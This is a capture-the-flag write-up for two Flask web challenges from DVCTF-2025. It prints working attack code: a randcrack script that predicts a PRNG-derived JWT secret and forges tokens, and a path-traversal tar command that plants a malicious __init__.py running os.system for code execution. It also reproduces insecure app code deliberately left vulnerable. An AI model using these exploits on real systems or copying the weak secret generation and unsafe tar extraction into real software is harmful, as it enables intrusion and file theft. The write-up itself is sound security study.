DVCT-2025-Web

Overview#

This is the write-up for 2 web challenges in DVCTF-2025. I forgot the name of the first challenge so I’ll call it ‘Challenge 1’ 😐.

Challenge 1 (Medium level)#

The challenge is a Flask-based web application running on port 10020. The goal is to retrieve a flag, likely stored in an image file (flag.webp), by exploiting vulnerabilities in the application’s JWT authentication and random number generation. So below is the source code app.py:

1
from flask import Flask, jsonify, abort, make_response, render_template, request
2
from os import path
3
import jwt
4
import datetime
5
import random
6
import base64
7

8
def generate_random_filename():
9
    rdn = random.getrandbits(32)
10
    return f"{rdn}.webp"
11

12
image_list = [generate_random_filename() for _ in range(650)]
13
app = Flask(__name__)
14

15
app.config['SECRET_KEY'] = str(random.getrandbits(32))
16

17
def generate_jwt():
18
    payload = {
19
        'sub': 'user_id',
20
        'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1),
21
        'iat': datetime.datetime.utcnow(),
22
        'profilepicture': f'./images/image.webp'
23
    }
24
    header = {
25
        'alg': 'HS256',
26
        'typ': 'JWT'
27
    }
28
    token = jwt.encode(
29
        payload,
30
        app.config['SECRET_KEY'],
31
        algorithm='HS256',
32
        headers=header
33
    )
34
    return token
35

36
def verify_jwt(token):
37
    try:
38
        payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
39
        return payload
40
    except jwt.ExpiredSignatureError:
41
        print("ExpiredSignatureError")
42
        return False
43
    except jwt.InvalidTokenError:
44
        print("InvalidTokenError")
45
        return False
46

47

48

49
def encode_image_to_base64(image_path):
50
    with open(image_path, "rb") as image_file:
51
        return base64.b64encode(image_file.read()).decode('utf-8')
52

53

54
@app.route('/', methods=['GET'])
55
def home():
56
    token = request.cookies.get('token')
57
    if token:
58
        print("verifying token: ",token)
59
        payload = verify_jwt(token)
60
        if payload:
61
            image_path = payload.get('profilepicture')
62
            print(image_path)
63
            if path.exists(image_path):
64
                image_base64 = encode_image_to_base64(image_path) if image_path.endswith('.webp') else encode_image_to_base64(f'./images/image.webp')
65
            else:
66
                image_base64 = encode_image_to_base64(f'./images/image.webp')
67

68

69
            return render_template('index.html', image_base64=image_base64)
70
        else:
71
            new_token = generate_jwt()
72
            new_payload = verify_jwt(new_token)
73
            new_image_path = new_payload.get('profilepicture')
74
            new_image_base64 = encode_image_to_base64(new_image_path)
75

76
            response = make_response(render_template('index.html',image_base64=new_image_base64))
77
            response.set_cookie('token', new_token)
78
            return response
79
    else:
80
        token = generate_jwt()
81
        payload = verify_jwt(token)
82
        image_path = payload.get('profilepicture')
83
        image_base64 = encode_image_to_base64(image_path)
84

85
        response = make_response(render_template('index.html', image_base64=image_base64))
86
        response.set_cookie('token', token)
87
        return response
88

89
@app.route('/images', methods=['GET'])
90
def get_all_images():
91
    return jsonify({'images': image_list})
92

93
if __name__ == '__main__':
94
    app.run(host='0.0.0.0', port=10020)

Source Code Analysis#

The provided Flask application has the following key components:

Random Filename Generation: The generate_random_filename() function uses random.getrandbits(32) to generate 650 random filenames in the format <random_number>.webp, stored in image_list. Then, we can get this list via /images endpoint.
Secret Key Generation: After genertate 650 random filenames above, the Flask app’s SECRET_KEY is set using str(random.getrandbits(32)), a 32-bit random number generated at startup.
JWT Handling: The JWT is signed using the HS256 algorithm with the SECRET_KEY. That decided which *.webp will be used in index.html.

Vulnerability Identification#

The key vulnerabilities are:

PRNG: The random library in Python uses a pseudo-random number generator. If we have enough states, we can crack the random generator and predict its future states. As mentioned above, this challenge provided me with 650 states (through generating image names).
JWT Forge: The SECRET_KEY is generated after generating the filenames. Therefore, if we crack the randomness, we can determine the key, making it easy to forge the JWT.

Exploit#

After some research on Github, I found this repo for cracking the Python randomness: Python-random-module-cracker. Absolute cinema 🤺 !!!. So this is my exploitation strategy:

Retrieve the list of filenames from /images.
Use the random numbers in the filenames to predict the PRNG state.
Recover the SECRET_KEY.
Forge a JWT with profilepicture set to ./images/flag.webp.
Use the forged JWT to access the flag image.

PoC#

This is my PoC:

1
from randcrack import RandCrack #type: ignore
2
from img import *
3
import jwt
4
import datetime
5

6
img_id = [x.split('.')[0] for x in img_lst]
7

8
rc = RandCrack()
9
for item in img_id[26:]:
10
  rc.submit(int(item))
11

12
secret = str(rc.predict_randrange(0, 4294967295))
13
print(f"[+] Secret: {secret}")
14

15
def generate_jwt():
16
    payload = {
17
        'sub': 'user_id',
18
        'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1),
19
        'iat': datetime.datetime.utcnow(),
20
        'profilepicture': f'./images/flag.webp'
21
    }
22
    header = {
23
        'alg': 'HS256',
24
        'typ': 'JWT'
25
    }
26
    token = jwt.encode(
27
        payload,
28
        secret,
29
        algorithm='HS256',
30
        headers=header
31
    )
32
    return token
33

34
print(f"[+] Token: {generate_jwt()}")

This is my first public write-up, so it may contain some mistakes. I’m very grateful to receive any feedback or suggestions to help me improve.🍀

Tarboom (Medium level)#

This challenge presents a web application written in Flask that allows users to upload .tar archive files. Upon upload, the server saves the file, extracts its contents into a subdirectory, and displays the extracted directory tree structure via HTML rendering. This is source code of app.py:

1
from flask import Flask, render_template, request
2
import os
3
from scripts.tarExtract import allowed_file, extract_tar, print_directory_tree
4

5
app = Flask(__name__)
6

7
# Configuration
8
UPLOAD_FOLDER = 'uploads'  # Directory to store uploaded TAR files
9
ALLOWED_EXTENSIONS = {'tar'}  # Allowed file extensions
10

11
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
12

13
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
14

15
@app.route('/', methods=['GET', 'POST'])
16
def upload_file():
17
    """Handle file upload and display the directory tree."""
18
    if request.method == 'POST':
19
        if 'file' not in request.files:
20
            return "No file uploaded", 400
21

22
        file = request.files['file']
23
        if file.filename == '':
24
            return "No file selected", 400
25

26
        if not allowed_file(file.filename, ALLOWED_EXTENSIONS):
27
            return "Invalid file type. Only .tar files are allowed.", 400
28

29
        tar_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
30
        file.save(tar_path)
31

32
        extract_dir = './extracted/' + os.path.splitext(file.filename)[0]
33
        os.makedirs(extract_dir, exist_ok=True)
34
        extract_tar(tar_path, extract_dir)
35

36
        tree = print_directory_tree(extract_dir)
37
        return render_template('result.html', tree=tree)
38

39
    return render_template('upload.html')
40

41
if __name__ == '__main__':
42
    app.run(host='0.0.0.0', port=5000,debug=True)

and tarExtract.py:

1
import os
2
import tarfile
3

4
def allowed_file(filename, allowed_extensions):
5
    """Check if the uploaded file has an allowed extension."""
6
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in allowed_extensions
7

8
def extract_tar(tar_path, extract_dir):
9
    try:
10
        with tarfile.open(tar_path, 'r:*') as tar:
11
            print(f"Extracting '{tar_path}' to '{extract_dir}'...")
12
            tar.extractall(path=extract_dir, filter='fully_trusted')
13
            print("Extraction completed successfully.")
14
    except tarfile.TarError as e:
15
        print(f"Error: Failed to extract the TAR file. {e}")
16

17
def print_directory_tree(directory, prefix=""):
18
    tree = []
19
    contents = os.listdir(directory)
20
    for i, item in enumerate(contents):
21
        item_path = os.path.join(directory, item)
22
        if os.path.isdir(item_path):
23
            tree.append(f"{prefix}├── {item}/")
24
            new_prefix = prefix + "│   " if i < len(contents) - 1 else prefix + "    "
25
            tree.extend(print_directory_tree(item_path, new_prefix))
26
        else:
27
            tree.append(f"{prefix}└── {item}")
28
    return tree

Key behavior:

File uploads are stored in uploads/.
Extraction occurs in ./extracted/<tar_filename_without_ext>/.
Extraction uses Python’s tarfile module with filter='fully_trusted'.

Vulnerability Strategy#

The use of tarfile.extractall() with filter='fully_trusted' poses a severe path traversal vulnerability, allowing malicious tar archives to overwrite files anywhere on the filesystem, including sensitive locations such as:

Application source directories (./scripts/, ./)

This vulnerability can be weaponized by injecting a malicious file such as __init__.py or app.py into a package directory to perform Remote Code Execution (RCE) on the server, assuming the Flask app is restarted or re-imports the injected content.

Exploitation Steps#

Now, after identifying the vulnerability, we build an attack vector:

Create the folder /app/scripts
Create the __init__.py with the content:

1
import os
2
os.system('cat flag.txt > /app/templates/upload.html')

Now, we tar this folder to init.tar use:

1
tar -cvf init.tar --absolute-names '../../../../../../../../../../../app/scripts/__init__.py'

Yep, as follow the report in Synk team Zip Slip Vulnerability. 4. Upload and return to / route to get flag.